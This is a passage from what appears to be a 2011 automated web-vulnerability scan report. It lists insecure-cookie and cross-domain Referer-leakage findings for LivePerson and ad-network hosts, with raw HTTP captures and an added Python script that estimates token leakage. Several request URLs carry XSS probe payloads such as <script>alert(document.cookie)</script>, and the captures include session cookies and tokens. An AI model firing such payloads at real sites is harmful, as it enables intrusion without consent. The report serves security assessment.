Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Secondary1; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 28 Jan 2011 14:16:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=1417917221691646769; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Secondary1; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296224193:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 14:16:33 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickCHATKEY=7678006185736106283; path=/hc/5296924; secure
Location: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H1417917221691646769-7678006185736106283K15949656
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 0


16.2. https://base.liveperson.net/hc/5296924/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/

Issue detail

The following cookies were issued by the application and do not have the secure flag set: LPit, HumanClickSiteContainerID_5296924 and LivePersonID (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/5296924/?lpCallId=1296223666173-668&lpjson=2&cmd=visitorEvents&site=5296924&sessionkey=H6680227135865200365-3761611791040242971K15949386&se=0 HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: https://base.liveperson.net/hc/5296924/?cmd=file&file=chatFrame&site=5296924&SV!chat-button-name=chat-seo-campaign1&SV!chat-button-room=chat-seo-campaign1&referrer=(button%20dynamic-button:chat-seo-campaign1(Live%20Chat%20by%20LivePerson))%20http%3A//solutions.liveperson.com/live-chat/C1/%3Futm_source%3Dbing%26utm_medium%3Dcpc%26utm_keyword%3Dlive%2520chat%26utm_campaign%3Dchat%2520-us&SESSIONVAR!skill=Sales&sessionkey=H6680227135865200365-3761611791040242971K15949386
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; LivePersonID=-16101423669632-1296223154:-1:-1:-1:-1; HumanClickCHATKEY=3761611791040242971; HumanClickSiteContainerID_5296924=primary; LPit=true; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 14:06:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LPit=false; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296223154:1296223611:-1:-1:-1; expires=Sat, 28-Jan-2012 14:06:54 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Fri, 28 Jan 2011 14:06:54 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 893

lpConnLib.Process({"ResultSet": {"lpCallId":"1296223666173-668","lpCallConfirm":"","lpData":[{"eSeq":0,"params":["noChatSession","Chat session has ended. Please close this window and click the chat bu
...[SNIP]...

16.3. https://base.liveperson.net/hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://base.liveperson.net
Path:   /hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/

Issue detail

The following cookies were issued by the application and do not have the secure flag set: LivePersonID, HumanClickKEY and HumanClickSiteContainerID_5296924 (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function. The request path contains an XSS probe string left over from a separate check; it is incidental to this cookie finding, which is reproduced by any request to the /hc/5296924/ path.

Request

GET /hc/5296924/5296924bff27%22%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e8465f0f4edd/?cmd=file&file=visitorWantsToTalk&site=5296924&voiceMethod=esc HTTP/1.1
Host: base.liveperson.net
Connection: keep-alive
Referer: http://burp/show/9
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=6680227135865200365; HumanClickCHATKEY=3761611791040242971; LPit=false; LivePersonID=-16101423669632-1296224208:-1:-1:-1:-1; HumanClickSiteContainerID_5296924=Master; LivePersonID=LP i=16101423669632,d=1294435351; ASPSESSIONIDCCQTSCAT=MAKLFIOAFLPGILKCPJFPHGPG; HumanClickACTIVE=1296223153625

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 15:05:19 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Set-Cookie: HumanClickKEY=8955939450992135978; path=/hc/5296924
Set-Cookie: HumanClickSiteContainerID_5296924=Master; path=/hc/5296924
Set-Cookie: LivePersonID=-16101423669632-1296227119:-1:-1:-1:-1; expires=Sat, 28-Jan-2012 15:05:19 GMT; path=/hc/5296924; domain=.liveperson.net
Content-Type: text/html;charset=UTF-8
Last-Modified: Fri, 28 Jan 2011 15:05:19 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 26936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="EN" xml:lang="EN">

<head>
<title>
...[SNIP]...

17. Cross-domain Referer leakage
There are 329 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
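The script below is an added example for this section, not scanner output or code from any of the ad networks listed. It takes the request URL and a fragment of the response body from issue 17.1 (both constructed here, with the URL shortened), flags query parameters that look like tokens, extracts the links to other domains, and reports which parameters each third party would receive in the Referer header under the default referrer behaviour of the report's era (the full URL, withheld only when an HTTPS page loads an HTTP resource). The parameter-name heuristic and the 20-character token threshold are assumptions of this example, not a definitive rule.

```python
"""Estimate cross-domain Referer leakage for a captured request/response pair.

Added example for this report section; it is not scanner output. The origin
URL and response fragment are constructed from issue 17.1 (URL shortened).
The sensitive-name heuristic and token-length threshold are assumptions.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qsl, urlsplit, urlunsplit

# Constructed sample: the 17.1 request URL (shortened) and the part of its
# response that references other hosts, plus a same-origin link for contrast.
ORIGIN_URL = ("http://a.tribalfusion.com/j.ad?site=nydailynewscom&adSpace=ros"
              "&tagKey=1282868635&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90")
RESPONSE_BODY = (
    '<img src="http://www.googleadservices.com/pagead/conversion/1030456406/'
    '?label=UH3wCKK4ggIQ1oiu6wM&amp;guid=ON&amp;script=0"/>'
    '<iframe src="http://a.tribalfusion.com/p.media/abc"></iframe>'
    '<a href="/j.ad?x=1">same-origin</a>'
)

# Assumed heuristic: parameter names that usually carry secrets.
SENSITIVE_NAME = re.compile(r"(key|token|sess|auth|pass|secret|sid)", re.I)
# Absolute http(s) URLs in src/href attributes.
URL_RE = re.compile(r"""(?:src|href)=["'](https?://[^"'\s]+)""", re.I)


def sensitive_query_params(url: str) -> List[str]:
    """Query parameter names that look secret: name matches the heuristic,
    or the value is a long, random-looking token (assumed threshold: 20 chars)."""
    found = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        looks_random = len(value) >= 20 and re.fullmatch(r"[A-Za-z0-9_\-]+", value)
        if SENSITIVE_NAME.search(name) or looks_random:
            found.append(name)
    return found


def cross_domain_links(body: str, origin_url: str) -> List[str]:
    """Absolute URLs in the body whose host differs from the origin host."""
    origin_host = urlsplit(origin_url).hostname
    links = []
    for raw in URL_RE.findall(body):
        url = raw.replace("&amp;", "&")  # undo HTML entity encoding
        if urlsplit(url).hostname != origin_host:
            links.append(url)
    return links


def referer_sent(origin_url: str, target_url: str) -> Optional[str]:
    """Referer under the 2011-era default: the full origin URL without fragment,
    except that an HTTPS page loading an HTTP resource sends none. Current
    browser defaults (strict-origin-when-cross-origin) trim this to the origin."""
    o, t = urlsplit(origin_url), urlsplit(target_url)
    if o.scheme == "https" and t.scheme == "http":
        return None
    return urlunsplit((o.scheme, o.netloc, o.path, o.query, ""))


def leaked_params(origin_url: str, body: str) -> Dict[str, List[str]]:
    """Map each cross-domain link to the sensitive-looking origin parameters
    it would receive through the Referer header."""
    params = sensitive_query_params(origin_url)
    leaks: Dict[str, List[str]] = {}
    for link in cross_domain_links(body, origin_url):
        if params and referer_sent(origin_url, link) is not None:
            leaks[link] = params
    return leaks


if __name__ == "__main__":
    for link, params in leaked_params(ORIGIN_URL, RESPONSE_BODY).items():
        print(f"{link}\n  receives via Referer: {', '.join(params)}")
```

On the constructed input the only cross-domain link is the googleadservices.com conversion pixel, and it would receive tagKey and tKey from the tribalfusion.com URL. Whether that matters depends on what tKey actually authorises, which is exactly the review the issue background asks for; the fix in the remediation above (keep tokens out of the query string) removes the question entirely.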


17.1. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; see the response excerpt below.

Request

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=apnbTgRkP6sAeCnr7aThQZcqPBHtrraZbSTRTZaxKPOHouZaJVIbQTSsBUPqmi4nEtfb83Zcvec3S8iUvCOxoTGpb74mTNHJQwaKvcNy6crTZaEDIyKsscnXKMV6dVS8Cjj39a44AW1RJsMFxcrNOalv5cGbdo53CJ3hSJeZbwgoZdoPQvB5XBWaxBldqc0yx46ZcRTwOnpIEM67ujH5rk8FCBUxUTVho7T8IJUMTYZd0TwwCm3rUsvAfXeyPY3GrFVTMo0OPnkPqLNfy7lucPe6JOaARob4cdJG8W6oycO0gCTFlhcLuNw9jFtSed6uw6r0tHISg1pRvsWAO7MY3Lr2uFxDUtZcyTAckJYAI3d3XPSQriZdEE06yPgwHHqlv652SvRZceLbX88lCpQEtnNoTnYu8efdTYcJkNCsd; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 14:14:39 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 660

document.write('<IFRAME src="http://a.tribalfusion.com/p.media/aomN7ET6np2sJ1YUrITPip5Pn6QPrE4WMo1t3LpdEw56nW5cj8Tsn7WcfiPAFwTWMPWFjP3rAwVEUrTaBcPTBZdSsJZbRrEvRdMdUVM54FXuntqo0aqp2tMBSGjA4AnZaoWXqTd36
...[SNIP]...
<div style="display:inline;">\r\n<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1030456406/?label=UH3wCKK4ggIQ1oiu6wM&amp;guid=ON&amp;script=0"/>\r\n<\/div>
...[SNIP]...

17.2. http://a.tribalfusion.com/j.ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /j.ad

Issue detail

The page was loaded from a URL containing a query string. The response contains a link to another domain; see the response excerpt below.

Request

GET /j.ad?site=nydailynewscom&adSpace=ros&tagKey=1282868635&th=24526296851&tKey=aVmn6ySVfC4AvEpWInUWZbPudZbi90&size=728x90&p=4068932&a=1&flashVer=10&ver=1.20&center=1&url=http%3A%2F%2Fwww.nydailynews.com%2Fblogs70f75'%253balert(document.cookie)%2F%2F84f766b9c15%2Fjets%2F2011%2F01%2Flive-chat-friday-noon-1&rurl=http%3A%2F%2Fburp%2Fshow%2F4&f=0&rnd=4069925 HTTP/1.1
Host: a.tribalfusion.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ANON_ID=aEn51LRZdySO6IUMsYExOjh1oBlrc7bJ8Za02ysiMOWruOZbe8aQHWTJ8WFv9mbElFFCFAwmoSrGk5x451A6bOHntMcsnInNDGLCwrScLQLMZaZb1Ncmcf7K20KbT57np199FZaw0mLWCH3AI5YJ0Wu36N55DyVPRBluxr7Bd5gBBXYkqRUe9UmE3CjxKLRFZcGvULfwumB2EKIn6QgbjSZcpCQcvO7WyZcQFe5mtDTRxdQZcIKWq8vfRhb6rjYSsPAM4QAsdVAed20A8B7YI0bHtTZatU7uo6f2JsWE7JrIZcnCEDooMfNC2sNZavfrtdRR9acdOQurFTy82SWn4nUGHFJMcjNnQ7dfKlmsY

Response

HTTP/1.1 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 101
X-Reuse-Index: 1
Pragma: no-cache
Cache-Control: private, no-cache, no-store, proxy-revalidate
Set-Cookie: ANON_ID=a0nbTgS3n0mUyoxEnVmZbn8Rm35W8Y5Fm2k2ZcsaR08Za4ZbBhGtn71EFGYaX5OPFPctGjZdgytTV9Dr0SQo6nINrQawbopBBVPaeOWm8w3XYBWZdv4My8ulEZdRReTSnFtVdjXIRKWDGETnTpT3upPIurHNmT1E2TZboYBVsZdQJYyZcoZbeshZcPZbZdfJEn8Ukl4kedmuEL7AZbrTiQIjfnoY4pCFp0WWd6Glh6GZcGhIQHTE22B4hIpF1eeU5P5IJAaHjh0RDZdmYHtSt3LZbYR15gJZcxLBr5FOSnfyXr99fkqMsHtOh42DN0bovTZdVICDDWXaank49lADYKZdQtvWNlZbZaOgJB9pYo2JI3AfAKnI2MyWKY7jSvQvTdgmuxZbZa1LT8phZa3XHmJjHDmPobwF9sQL5tv570TJlH7pBwZdyb2; path=/; domain=.tribalfusion.com; expires=Thu, 28-Apr-2011 16:37:17 GMT;
Content-Type: application/x-javascript
Vary: Accept-Encoding
Expires: 0
Connection: keep-alive
Content-Length: 263

document.write('<iframe src="http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x2fe4f5.js&size_id=2&account_id=5804&site_id=7477&size=728x90" width=728 height=90 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0 scrolling=no><\/iframe>
...[SNIP]...

17.3. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; see the response excerpt below.

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=86551686&rk1=26330496&rk2=1296251850.357&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
Set-Cookie: c=AQEEAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAxZEByjtDTQAAAAAAAAAAAAAAAAAAAADUO0NNAQABAHVvC9XoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADfTrnU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==; path=/; expires=Sat, 31-Dec-2019 00:00:00 GMT; domain=afy11.net;
P3P: policyref="http://ad.afy11.net/privacy.xml", CP=" NOI DSP NID ADMa DEVa PSAa PSDa OUR OTRa IND COM NAV STA OTC"

<script type="text/javascript" src="http://ad.afy11.net/sracl.js"></script>

<div style="width: 300px; height: 250px; border-width: 0px;">
<IFRAME SRC="http://ad.doubleclick.net/adi/N3671.CentroNetwork/B5159652.2;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3671.CentroNetwork/B5159652.2;abr=!ie;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?">
</SCRIPT>
...[SNIP]...
TH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!http://ad.doubleclick.net/jump/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];ord=2803508621?">
<IMG SRC="http://ad.doubleclick.net/ad/N3671.CentroNetwork/B5159652.2;abr=!ie4;abr=!ie5;sz=300x250;pc=[TPAS_ID];click=http://ad.afy11.net/ad?c=RhmTmvF0v0C6AZspIIWveWN0Im0fysTH31JY4UqlsUQ8lz18BCOULwciAi30lx5LMPzBmPTAaphQv7AZU9Kg52S6m38Ac8DgUfVTKS3d+ZM=!;ord=2803508621?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.4. http://ad.afy11.net/ad

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /ad

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; see the response excerpt below.

Request

GET /ad?asId=1000004165407&sd=2x300x250&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=38178276&rk1=15197426&rk2=1296251850.36&pt=0 HTTP/1.1
Host: ad.afy11.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: a=AZ7s9B85IkyRNDgbVDU-vg; s=1,2*4d2913f5*YxNSVIeEeL*XkHked9a5WVEwm102ii7WMtfCA==*; c=AQEDAAAAAACarxAA-hMpTQAAAAAAAAAAAAAAAAAAAAD1EylNAQABANG4BtXoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACzbLjU6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGXzrQE5fjdNAAAAAAAAAAAAAAAAAAAAAAN+N00CAAIAdaTl1OgAAADlRP3U6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF+9sdToAAAAD7221OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAkqJXAPN-N00AAAAAAAAAAAAAAAAAAAAAvn83TQEAAgARpOXU6AAAAHWk5dToAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX72x1OgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=; f=AgECAAAAAAALqJELwX83TQyokQsDfjdN

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache, must-revalidate
Server: AdifyServer
Content-Type: text/html; charset=utf-8
Content-Length: 1767
